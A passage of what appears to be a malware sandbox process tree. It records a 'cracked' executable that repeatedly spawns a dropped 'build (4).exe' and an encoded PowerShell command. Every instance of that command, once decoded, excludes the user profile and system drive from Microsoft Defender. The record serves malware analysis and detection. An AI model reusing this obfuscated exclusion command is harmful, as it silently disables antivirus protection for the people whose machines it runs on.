-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"63⤵PID:7144
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="64⤵
- Suspicious use of AdjustPrivilegeToken
PID:5332
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"64⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1104
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"64⤵PID:6688
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="65⤵
- Suspicious use of AdjustPrivilegeToken
PID:6656
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"65⤵
- Executes dropped EXE
PID:3764
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"65⤵
- System Location Discovery: System Language Discovery
PID:5532 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="66⤵PID:5208
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"66⤵PID:4196
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"66⤵PID:6820
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="67⤵PID:6816
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"67⤵PID:4844
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"67⤵PID:5712
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="68⤵PID:6968
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"68⤵PID:3068
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"68⤵PID:7096
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="69⤵PID:3428
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"69⤵PID:3292
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"69⤵PID:6060
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="70⤵
- System Location Discovery: System Language Discovery
PID:1928
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"70⤵PID:3092
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"70⤵PID:6444
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="71⤵PID:6072
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"71⤵PID:5520
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"71⤵
- System Location Discovery: System Language Discovery
PID:5140 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="72⤵PID:6948
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"72⤵PID:1888
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"72⤵PID:3152
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="73⤵PID:6228
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"73⤵PID:5200
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"73⤵PID:5804
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="74⤵
- System Location Discovery: System Language Discovery
PID:2784
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"74⤵PID:5144
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"74⤵
- System Location Discovery: System Language Discovery
PID:3380 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="75⤵
- System Location Discovery: System Language Discovery
PID:3152
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"75⤵PID:4832
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"75⤵PID:6768
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="76⤵PID:5416
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"76⤵PID:5172
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"76⤵PID:6048
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="77⤵PID:6928
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"77⤵PID:7032
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"77⤵PID:5728
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="78⤵PID:4632
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV179⤵PID:5132
-
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"78⤵
- System Location Discovery: System Language Discovery
PID:4868
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"78⤵PID:7060
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="79⤵PID:6952
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"79⤵PID:924
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"79⤵PID:7108
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="80⤵
- System Location Discovery: System Language Discovery
PID:4916
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"80⤵PID:6116
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"80⤵PID:1840
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="81⤵PID:6308
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"81⤵PID:6208
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"81⤵PID:6904
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="82⤵PID:5476
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"82⤵PID:3464
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"82⤵PID:2920
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="83⤵PID:5740
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"83⤵PID:6000
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"83⤵PID:5192
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="84⤵PID:7128
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"84⤵PID:4952
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"84⤵PID:4888
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="85⤵PID:1060
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"85⤵PID:5004
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"85⤵PID:6636
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="86⤵PID:1740
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"86⤵PID:5860
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"86⤵PID:1932
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="87⤵PID:1720
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"87⤵PID:4104
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"87⤵PID:7180
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="88⤵PID:7340
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"88⤵PID:7380
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"88⤵PID:7400
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="89⤵PID:7568
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"89⤵PID:7576
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"89⤵PID:7584
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="90⤵PID:7800
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"90⤵PID:7808
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"90⤵PID:7856
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="91⤵PID:8024
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"91⤵PID:8032
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"91⤵PID:8112
-
